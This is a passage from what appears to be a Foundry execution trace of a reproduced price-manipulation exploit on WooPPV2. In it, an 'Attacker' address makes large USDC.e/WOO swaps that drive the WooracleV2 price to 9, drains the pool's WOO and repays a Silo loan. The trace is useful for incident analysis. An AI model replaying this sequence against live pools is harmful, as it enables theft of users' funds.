    │   │   │   │   │   │   │        topic 1: 0x000000000000000000000000ff970a61a04b1ca14834a43f5de4533ebddb5cc8
    │   │   │   │   │   │   │        topic 2: 0x00000000000000000000000082af49447d8a07e3bd95bd0d56f35241523fbab1
    │   │   │   │   │   │   │        topic 3: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   │   │   │   │           data: 0x000000000000000000000000000000000000000000000000000001d1a94a200000000000000000000000000000000000000000000000001c504d84dcd7f8a5dc0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496000000000000000000000000000000000000000000000000000001d1a94a2000000000000000000000000000000000000000000000000000000000001dcd6500
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x6345f681a607b25c22c16ca48cd1b5d6226ba97b23436d5e19d0160167788e9c: 0x000000000000000000000000000000000000000000000000000001c3818c644c → 0x000000000000000000000000000000000000000000000000000003950d091f4c
    │   │   │   │   │   │   │   @ 3: 0x0000000000000000000000000000000000000000000000000000000251ee2648 → 0x000000000000000000000000000000000000000000000000000000026fbb8b48
    │   │   │   │   │   │   │   @ 0x2adc42359e3ba5e432e6ed5fbd819d73fb089a127b26b7c46b6c2ceff8869d9a: 0x00000000000000190000000000000000000000000000004b37078859347f2328 → 0x00000000000000190000000000000000000000000000002ee6ba037c5c867d4c
    │   │   │   │   │   │   └─ ← [Return] 522295261244159469020 [5.222e20]
    │   │   │   │   │   ├─ [6227] WooracleV2::state(WOO: [0xcAFcD85D8ca7Ad1e1C6F82F651fA15E33AEfD07b]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] State({ price: 56608180 [5.66e7], spread: 5560000000000000 [5.56e15], coeff: 110000000000 [1.1e11], woFeasible: true })
    │   │   │   │   │   ├─ [4697] USDCe::transfer(WooPPV2: [0xeFF23B4bE1091b53205E35f3AfCD9C7182bf3062], 100000000000 [1e11])
    │   │   │   │   │   │   ├─ [3951] 0x1eFB3f88Bc88f03FD1804A5C53b7141bbEf5dED8::transfer(WooPPV2: [0xeFF23B4bE1091b53205E35f3AfCD9C7182bf3062], 100000000000 [1e11]) [delegatecall]
    │   │   │   │   │   │   │   ├─ emit Transfer(from: Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: WooPPV2: [0xeFF23B4bE1091b53205E35f3AfCD9C7182bf3062], value: 100000000000 [1e11])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x3294e31e857a8281d7b20b9a55b81a6c7534af3c5a5b8bbb1d370446531369f7: 0x000000000000000000000000000000000000000000000000000003977cc4aa94 → 0x000000000000000000000000000000000000000000000000000003aec53b9294
    │   │   │   │   │   │   │   │   @ 0xf85b56951f6ca259eb015e4162809ffc1dd28bc06ffa5a7aa716f2780313bdca: 0x0000000000000000000000000000000000000000000000000000016f0b89c58c → 0x00000000000000000000000000000000000000000000000000000157c312dd8c
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [43302] WooPPV2::swap(USDCe: [0xFF970A61A04b1cA14834A43f5dE4533eBDDB5CC8], WOO: [0xcAFcD85D8ca7Ad1e1C6F82F651fA15E33AEfD07b], 100000000000 [1e11], 0, Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   │   ├─ [1296] USDCe::balanceOf(WooPPV2: [0xeFF23B4bE1091b53205E35f3AfCD9C7182bf3062]) [staticcall]
    │   │   │   │   │   │   │   ├─ [553] 0x1eFB3f88Bc88f03FD1804A5C53b7141bbEf5dED8::balanceOf(WooPPV2: [0xeFF23B4bE1091b53205E35f3AfCD9C7182bf3062]) [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 4049168208532 [4.049e12]
    │   │   │   │   │   │   │   └─ ← [Return] 4049168208532 [4.049e12]
    │   │   │   │   │   │   ├─ [2227] WooracleV2::state(WOO: [0xcAFcD85D8ca7Ad1e1C6F82F651fA15E33AEfD07b]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] State({ price: 56608180 [5.66e7], spread: 5560000000000000 [5.56e15], coeff: 110000000000 [1.1e11], woFeasible: true })
    │   │   │   │   │   │   ├─ [689] WooracleV2::decimals(WOO: [0xcAFcD85D8ca7Ad1e1C6F82F651fA15E33AEfD07b]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000008
    │   │   │   │   │   │   ├─ [1121] USDCe::decimals() [staticcall]
    │   │   │   │   │   │   │   ├─ [381] 0x1eFB3f88Bc88f03FD1804A5C53b7141bbEf5dED8::decimals() [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 6
    │   │   │   │   │   │   │   └─ ← [Return] 6
    │   │   │   │   │   │   ├─ [1635] WOO::decimals() [staticcall]
    │   │   │   │   │   │   │   ├─ [337] 0xE72ba9418b5f2Ce0A6a40501Fe77c6839Aa37333::implementation() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x3f770Ac673856F105b586bb393d122721265aD46
    │   │   │   │   │   │   │   ├─ [501] 0x3f770Ac673856F105b586bb393d122721265aD46::decimals() [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 18
    │   │   │   │   │   │   │   └─ ← [Return] 18
    │   │   │   │   │   │   ├─ [4070] WooracleV2::postPrice(WOO: [0xcAFcD85D8ca7Ad1e1C6F82F651fA15E33AEfD07b], 57853248 [5.785e7])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x3de04d4cd833c39050885e49b143780bca279f0363cc7640ad46a56692621212: 0x0013c0ca60f38000000000199c82cc00000000000000000000000000035fc5b4 → 0x0013c0ca60f38000000000199c82cc000000000000000000000000000372c540
    │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   ├─ [9327] WOO::transfer(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 173684596344998196373739 [1.736e23])
    │   │   │   │   │   │   │   ├─ [337] 0xE72ba9418b5f2Ce0A6a40501Fe77c6839Aa37333::implementation() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x3f770Ac673856F105b586bb393d122721265aD46
    │   │   │   │   │   │   │   ├─ [8187] 0x3f770Ac673856F105b586bb393d122721265aD46::transfer(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 173684596344998196373739 [1.736e23]) [delegatecall]
    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: WooPPV2: [0xeFF23B4bE1091b53205E35f3AfCD9C7182bf3062], to: Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 173684596344998196373739 [1.736e23])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 0xf85b56951f6ca259eb015e4162809ffc1dd28bc06ffa5a7aa716f2780313bdca: 0x00000000000000000000000000000000000000000006732035a50e3936bc574c → 0x0000000000000000000000000000000000000000000697e7ab9e4991ad1fc037
    │   │   │   │   │   │   │   │   │   @ 0x3294e31e857a8281d7b20b9a55b81a6c7534af3c5a5b8bbb1d370446531369f7: 0x000000000000000000000000000000000000000000021c77cb09e2d7817137be → 0x00000000000000000000000000000000000000000001f7b05510a77f0b0dced3
    │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─  emit topic 0: 0x0e8e403c2d36126272b08c75823e988381d9dc47f2f0a9a080d95f891d95c469
    │   │   │   │   │   │   │        topic 1: 0x000000000000000000000000ff970a61a04b1ca14834a43f5de4533ebddb5cc8
    │   │   │   │   │   │   │        topic 2: 0x000000000000000000000000cafcd85d8ca7ad1e1c6f82f651fa15e33aefd07b
    │   │   │   │   │   │   │        topic 3: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   │   │   │   │           data: 0x000000000000000000000000000000000000000000000000000000174876e8000000000000000000000000000000000000000000000024c775f93b58766368eb0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496000000000000000000000000000000000000000000000000000000174876e80000000000000000000000000000000000000000000000000000000000017d7840
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x3de04d4cd833c39050885e49b143780bca279f0363cc7640ad46a56692621212: 0x0013c0ca60f38000000000199c82cc00000000000000000000000000035fc5b4 → 0x0013c0ca60f38000000000199c82cc000000000000000000000000000372c540
    │   │   │   │   │   │   │   @ 0x6345f681a607b25c22c16ca48cd1b5d6226ba97b23436d5e19d0160167788e9c: 0x000000000000000000000000000000000000000000000000000003950d091f4c → 0x000000000000000000000000000000000000000000000000000003ac54028f0c
    │   │   │   │   │   │   │   @ 0xf32e5899d3e170e9e8c60e48f6aaed97a14cff36ccb732754e5bee456df1f6f1: 0x000000000000001900000000000000000000000000021c77cb09e2d7817137be → 0x00000000000000190000000000000000000000000001f7b05510a77f0b0dced3
    │   │   │   │   │   │   │   @ 3: 0x000000000000000000000000000000000000000000000000000000026fbb8b48 → 0x0000000000000000000000000000000000000000000000000000000271390388
    │   │   │   │   │   │   └─ ← [Return] 173684596344998196373739 [1.736e23]
    │   │   │   │   │   ├─ [2227] WooracleV2::state(WOO: [0xcAFcD85D8ca7Ad1e1C6F82F651fA15E33AEfD07b]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] State({ price: 57853248 [5.785e7], spread: 5560000000000000 [5.56e15], coeff: 110000000000 [1.1e11], woFeasible: true })
    │   │   │   │   │   ├─ [4527] WOO::transfer(WooPPV2: [0xeFF23B4bE1091b53205E35f3AfCD9C7182bf3062], 7856868800000000000000000 [7.856e24])
    │   │   │   │   │   │   ├─ [337] 0xE72ba9418b5f2Ce0A6a40501Fe77c6839Aa37333::implementation() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x3f770Ac673856F105b586bb393d122721265aD46
    │   │   │   │   │   │   ├─ [3387] 0x3f770Ac673856F105b586bb393d122721265aD46::transfer(WooPPV2: [0xeFF23B4bE1091b53205E35f3AfCD9C7182bf3062], 7856868800000000000000000 [7.856e24]) [delegatecall]
    │   │   │   │   │   │   │   ├─ emit Transfer(from: Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: WooPPV2: [0xeFF23B4bE1091b53205E35f3AfCD9C7182bf3062], value: 7856868800000000000000000 [7.856e24])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x3294e31e857a8281d7b20b9a55b81a6c7534af3c5a5b8bbb1d370446531369f7: 0x00000000000000000000000000000000000000000001f7b05510a77f0b0dced3 → 0x0000000000000000000000000000000000000000000877720b1af485546dced3
    │   │   │   │   │   │   │   │   @ 0xf85b56951f6ca259eb015e4162809ffc1dd28bc06ffa5a7aa716f2780313bdca: 0x0000000000000000000000000000000000000000000697e7ab9e4991ad1fc037 → 0x000000000000000000000000000000000000000000001825f593fc8b63bfc037
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [31538] WooPPV2::swap(WOO: [0xcAFcD85D8ca7Ad1e1C6F82F651fA15E33AEfD07b], USDCe: [0xFF970A61A04b1cA14834A43f5dE4533eBDDB5CC8], 7856868800000000000000000 [7.856e24], 0, Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   │   ├─ [1602] WOO::balanceOf(WooPPV2: [0xeFF23B4bE1091b53205E35f3AfCD9C7182bf3062]) [staticcall]
    │   │   │   │   │   │   │   ├─ [337] 0xE72ba9418b5f2Ce0A6a40501Fe77c6839Aa37333::implementation() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x3f770Ac673856F105b586bb393d122721265aD46
    │   │   │   │   │   │   │   ├─ [465] 0x3f770Ac673856F105b586bb393d122721265aD46::balanceOf(WooPPV2: [0xeFF23B4bE1091b53205E35f3AfCD9C7182bf3062]) [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 10235471897423661362958035 [1.023e25]
    │   │   │   │   │   │   │   └─ ← [Return] 10235471897423661362958035 [1.023e25]
    │   │   │   │   │   │   ├─ [2227] WooracleV2::state(WOO: [0xcAFcD85D8ca7Ad1e1C6F82F651fA15E33AEfD07b]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] State({ price: 57853248 [5.785e7], spread: 5560000000000000 [5.56e15], coeff: 110000000000 [1.1e11], woFeasible: true })
    │   │   │   │   │   │   ├─ [689] WooracleV2::decimals(WOO: [0xcAFcD85D8ca7Ad1e1C6F82F651fA15E33AEfD07b]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000008
    │   │   │   │   │   │   ├─ [1121] USDCe::decimals() [staticcall]
    │   │   │   │   │   │   │   ├─ [381] 0x1eFB3f88Bc88f03FD1804A5C53b7141bbEf5dED8::decimals() [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 6
    │   │   │   │   │   │   │   └─ ← [Return] 6
    │   │   │   │   │   │   ├─ [1635] WOO::decimals() [staticcall]
    │   │   │   │   │   │   │   ├─ [337] 0xE72ba9418b5f2Ce0A6a40501Fe77c6839Aa37333::implementation() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x3f770Ac673856F105b586bb393d122721265aD46
    │   │   │   │   │   │   │   ├─ [501] 0x3f770Ac673856F105b586bb393d122721265aD46::decimals() [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 18
    │   │   │   │   │   │   │   └─ ← [Return] 18
    │   │   │   │   │   │   ├─ [1270] WooracleV2::postPrice(WOO: [0xcAFcD85D8ca7Ad1e1C6F82F651fA15E33AEfD07b], 9)
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x3de04d4cd833c39050885e49b143780bca279f0363cc7640ad46a56692621212: 0x0013c0ca60f38000000000199c82cc000000000000000000000000000372c540 → 0x0013c0ca60f38000000000199c82cc0000000000000000000000000000000009
    │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   ├─ [4697] USDCe::transfer(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 2246892686007 [2.246e12])
    │   │   │   │   │   │   │   ├─ [3951] 0x1eFB3f88Bc88f03FD1804A5C53b7141bbEf5dED8::transfer(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 2246892686007 [2.246e12]) [delegatecall]
    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: WooPPV2: [0xeFF23B4bE1091b53205E35f3AfCD9C7182bf3062], to: Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 2246892686007 [2.246e12])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 0x3294e31e857a8281d7b20b9a55b81a6c7534af3c5a5b8bbb1d370446531369f7: 0x000000000000000000000000000000000000000000000000000003aec53b9294 → 0x000000000000000000000000000000000000000000000000000001a39ffe07dd
    │   │   │   │   │   │   │   │   │   @ 0xf85b56951f6ca259eb015e4162809ffc1dd28bc06ffa5a7aa716f2780313bdca: 0x00000000000000000000000000000000000000000000000000000157c312dd8c → 0x00000000000000000000000000000000000000000000000000000362e8506843
    │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─  emit topic 0: 0x0e8e403c2d36126272b08c75823e988381d9dc47f2f0a9a080d95f891d95c469
    │   │   │   │   │   │   │        topic 1: 0x000000000000000000000000cafcd85d8ca7ad1e1c6f82f651fa15e33aefd07b
    │   │   │   │   │   │   │        topic 2: 0x000000000000000000000000ff970a61a04b1ca14834a43f5de4533ebddb5cc8
    │   │   │   │   │   │   │        topic 3: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   │   │   │   │           data: 0x000000000000000000000000000000000000000000067fc1b60a4d06496000000000000000000000000000000000000000000000000000000000020b253d8ab70000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000000000000000000000000000000000020b46bae68c00000000000000000000000000000000000000000000000000000000217d5bd5
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xf32e5899d3e170e9e8c60e48f6aaed97a14cff36ccb732754e5bee456df1f6f1: 0x00000000000000190000000000000000000000000001f7b05510a77f0b0dced3 → 0x0000000000000019000000000000000000000000000877720b1af485546dced3
    │   │   │   │   │   │   │   @ 0x3de04d4cd833c39050885e49b143780bca279f0363cc7640ad46a56692621212: 0x0013c0ca60f38000000000199c82cc000000000000000000000000000372c540 → 0x0013c0ca60f38000000000199c82cc0000000000000000000000000000000009
    │   │   │   │   │   │   │   @ 3: 0x0000000000000000000000000000000000000000000000000000000271390388 → 0x0000000000000000000000000000000000000000000000000000000292b65f5d
    │   │   │   │   │   │   │   @ 0x6345f681a607b25c22c16ca48cd1b5d6226ba97b23436d5e19d0160167788e9c: 0x000000000000000000000000000000000000000000000000000003ac54028f0c → 0x000000000000000000000000000000000000000000000000000001a10d47a880
    │   │   │   │   │   │   └─ ← [Return] 2246892686007 [2.246e12]
    │   │   │   │   │   ├─ [2227] WooracleV2::state(WOO: [0xcAFcD85D8ca7Ad1e1C6F82F651fA15E33AEfD07b]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] State({ price: 9, spread: 5560000000000000 [5.56e15], coeff: 110000000000 [1.1e11], woFeasible: true })
    │   │   │   │   │   ├─ [647] WooPPV2::poolSize(WOO: [0xcAFcD85D8ca7Ad1e1C6F82F651fA15E33AEfD07b]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 10235471897423661362958035 [1.023e25]
    │   │   │   │   │   ├─ [1296] USDCe::balanceOf(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   ├─ [553] 0x1eFB3f88Bc88f03FD1804A5C53b7141bbEf5dED8::balanceOf(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 3723339262019 [3.723e12]
    │   │   │   │   │   │   └─ ← [Return] 3723339262019 [3.723e12]
    │   │   │   │   │   ├─ [4697] USDCe::transfer(WooPPV2: [0xeFF23B4bE1091b53205E35f3AfCD9C7182bf3062], 926342 [9.263e5])
    │   │   │   │   │   │   ├─ [3951] 0x1eFB3f88Bc88f03FD1804A5C53b7141bbEf5dED8::transfer(WooPPV2: [0xeFF23B4bE1091b53205E35f3AfCD9C7182bf3062], 926342 [9.263e5]) [delegatecall]
    │   │   │   │   │   │   │   ├─ emit Transfer(from: Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: WooPPV2: [0xeFF23B4bE1091b53205E35f3AfCD9C7182bf3062], value: 926342 [9.263e5])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0xf85b56951f6ca259eb015e4162809ffc1dd28bc06ffa5a7aa716f2780313bdca: 0x00000000000000000000000000000000000000000000000000000362e8506843 → 0x00000000000000000000000000000000000000000000000000000362e84245bd
    │   │   │   │   │   │   │   │   @ 0x3294e31e857a8281d7b20b9a55b81a6c7534af3c5a5b8bbb1d370446531369f7: 0x000000000000000000000000000000000000000000000000000001a39ffe07dd → 0x000000000000000000000000000000000000000000000000000001a3a00c2a63
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [30902] WooPPV2::swap(USDCe: [0xFF970A61A04b1cA14834A43f5dE4533eBDDB5CC8], WOO: [0xcAFcD85D8ca7Ad1e1C6F82F651fA15E33AEfD07b], 926342 [9.263e5], 0, Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   │   ├─ [1296] USDCe::balanceOf(WooPPV2: [0xeFF23B4bE1091b53205E35f3AfCD9C7182bf3062]) [staticcall]
    │   │   │   │   │   │   │   ├─ [553] 0x1eFB3f88Bc88f03FD1804A5C53b7141bbEf5dED8::balanceOf(WooPPV2: [0xeFF23B4bE1091b53205E35f3AfCD9C7182bf3062]) [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 1802276448867 [1.802e12]
    │   │   │   │   │   │   │   └─ ← [Return] 1802276448867 [1.802e12]
    │   │   │   │   │   │   ├─ [2227] WooracleV2::state(WOO: [0xcAFcD85D8ca7Ad1e1C6F82F651fA15E33AEfD07b]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] State({ price: 9, spread: 5560000000000000 [5.56e15], coeff: 110000000000 [1.1e11], woFeasible: true })
    │   │   │   │   │   │   ├─ [689] WooracleV2::decimals(WOO: [0xcAFcD85D8ca7Ad1e1C6F82F651fA15E33AEfD07b]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000008
    │   │   │   │   │   │   ├─ [1121] USDCe::decimals() [staticcall]
    │   │   │   │   │   │   │   ├─ [381] 0x1eFB3f88Bc88f03FD1804A5C53b7141bbEf5dED8::decimals() [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 6
    │   │   │   │   │   │   │   └─ ← [Return] 6
    │   │   │   │   │   │   ├─ [1635] WOO::decimals() [staticcall]
    │   │   │   │   │   │   │   ├─ [337] 0xE72ba9418b5f2Ce0A6a40501Fe77c6839Aa37333::implementation() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x3f770Ac673856F105b586bb393d122721265aD46
    │   │   │   │   │   │   │   ├─ [501] 0x3f770Ac673856F105b586bb393d122721265aD46::decimals() [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 18
    │   │   │   │   │   │   │   └─ ← [Return] 18
    │   │   │   │   │   │   ├─ [1270] WooracleV2::postPrice(WOO: [0xcAFcD85D8ca7Ad1e1C6F82F651fA15E33AEfD07b], 9)
    │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   ├─ [4527] WOO::transfer(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 10232908094389174718777777 [1.023e25])
    │   │   │   │   │   │   │   ├─ [337] 0xE72ba9418b5f2Ce0A6a40501Fe77c6839Aa37333::implementation() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x3f770Ac673856F105b586bb393d122721265aD46
    │   │   │   │   │   │   │   ├─ [3387] 0x3f770Ac673856F105b586bb393d122721265aD46::transfer(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 10232908094389174718777777 [1.023e25]) [delegatecall]
    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: WooPPV2: [0xeFF23B4bE1091b53205E35f3AfCD9C7182bf3062], to: Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 10232908094389174718777777 [1.023e25])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 0x3294e31e857a8281d7b20b9a55b81a6c7534af3c5a5b8bbb1d370446531369f7: 0x0000000000000000000000000000000000000000000877720b1af485546dced3 → 0x00000000000000000000000000000000000000000000008afbea1c4144fc8522
    │   │   │   │   │   │   │   │   │   @ 0xf85b56951f6ca259eb015e4162809ffc1dd28bc06ffa5a7aa716f2780313bdca: 0x000000000000000000000000000000000000000000001825f593fc8b63bfc037 → 0x000000000000000000000000000000000000000000088f0d04c4d4cf733109e8
    │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─  emit topic 0: 0x0e8e403c2d36126272b08c75823e988381d9dc47f2f0a9a080d95f891d95c469
    │   │   │   │   │   │   │        topic 1: 0x000000000000000000000000ff970a61a04b1ca14834a43f5de4533ebddb5cc8
    │   │   │   │   │   │   │        topic 2: 0x000000000000000000000000cafcd85d8ca7ad1e1c6f82f651fa15e33aefd07b
    │   │   │   │   │   │   │        topic 3: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   │   │   │   │           data: 0x00000000000000000000000000000000000000000000000000000000000e22860000000000000000000000000000000000000000000876e70f30d8440f7149b10000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e149600000000000000000000000000000000000000000000000000000000000e228600000000000000000000000000000000000000000000000000000000000000e7
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 3: 0x0000000000000000000000000000000000000000000000000000000292b65f5d → 0x0000000000000000000000000000000000000000000000000000000292b66044
    │   │   │   │   │   │   │   @ 0xf32e5899d3e170e9e8c60e48f6aaed97a14cff36ccb732754e5bee456df1f6f1: 0x0000000000000019000000000000000000000000000877720b1af485546dced3 → 0x00000000000000190000000000000000000000000000008afbea1c4144fc8522
    │   │   │   │   │   │   │   @ 0x6345f681a607b25c22c16ca48cd1b5d6226ba97b23436d5e19d0160167788e9c: 0x000000000000000000000000000000000000000000000000000001a10d47a880 → 0x000000000000000000000000000000000000000000000000000001a10d55ca1f
    │   │   │   │   │   │   └─ ← [Return] 10232908094389174718777777 [1.023e25]
    │   │   │   │   │   ├─ [29303] Silo::repay(WOO: [0xcAFcD85D8ca7Ad1e1C6F82F651fA15E33AEfD07b], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   │   │   ├─ [1301] 0x8658047e48CC09161f4152c79155Dac1d710Ff0a::isSiloPaused(Silo: [0x5C2B80214c1961dB06f69DD4128BcfFc6423d44F], WOO: [0xcAFcD85D8ca7Ad1e1C6F82F651fA15E33AEfD07b]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   │   ├─ [579] 0x602dB6e46B41bc2B9e2c6b3F8594C49CF8B8857D::balanceOf(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 5083902323623058456015968 [5.083e24]
    │   │   │   │   │   │   ├─ [349] 0x602dB6e46B41bc2B9e2c6b3F8594C49CF8B8857D::totalSupply() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 5220006534884979612820252 [5.22e24]
    │   │   │   │   │   │   ├─ emit Repay(param0: WOO: [0xcAFcD85D8ca7Ad1e1C6F82F651fA15E33AEfD07b], param1: Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 5092663209802375827262436 [5.092e24])
    │   │   │   │   │   │   ├─ [7271] WOO::transferFrom(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], Silo: [0x5C2B80214c1961dB06f69DD4128BcfFc6423d44F], 5092663209802375827262436 [5.092e24])
    │   │   │   │   │   │   │   ├─ [337] 0xE72ba9418b5f2Ce0A6a40501Fe77c6839Aa37333::implementation() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x3f770Ac673856F105b586bb393d122721265aD46
    │   │   │   │   │   │   │   ├─ [6128] 0x3f770Ac673856F105b586bb393d122721265aD46::transferFrom(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], Silo: [0x5C2B80214c1961dB06f69DD4128BcfFc6423d44F], 5092663209802375827262436 [5.092e24]) [delegatecall]
    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: Silo: [0x5C2B80214c1961dB06f69DD4128BcfFc6423d44F], value: 5092663209802375827262436 [5.092e24])
    │   │   │   │   │   │   │   │   ├─ emit Approval(owner: Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: Silo: [0x5C2B80214c1961dB06f69DD4128BcfFc6423d44F], value: 115792089237316195423570985008687907853269984665640558946794374205537302377499 [1.157e77])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 0xf85b56951f6ca259eb015e4162809ffc1dd28bc06ffa5a7aa716f2780313bdca: 0x000000000000000000000000000000000000000000088f0d04c4d4cf733109e8 → 0x0000000000000000000000000000000000000000000458a3315dd7a2947d7e04
    │   │   │   │   │   │   │   │   │   @ 0x4a118db3f320de5789eb241d5a09272e3d70541292a2d8e35e3916f8589e6a3e: 0 → 0x000000000000000000000000000000000000000000043669d366fd2cdeb38be4
    │   │   │   │   │   │   │   │   │   @ 0x9c754c9c914dd33bd112bbe305006bc159855f0bf942085ec535d5fb55c83e56: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xfffffffffffffffffffffffffffffffffffffffffffbc9962c9902d3214c741b
    │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─ [8819] 0x602dB6e46B41bc2B9e2c6b3F8594C49CF8B8857D::burn(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 5083902323623058456015968 [5.083e24])
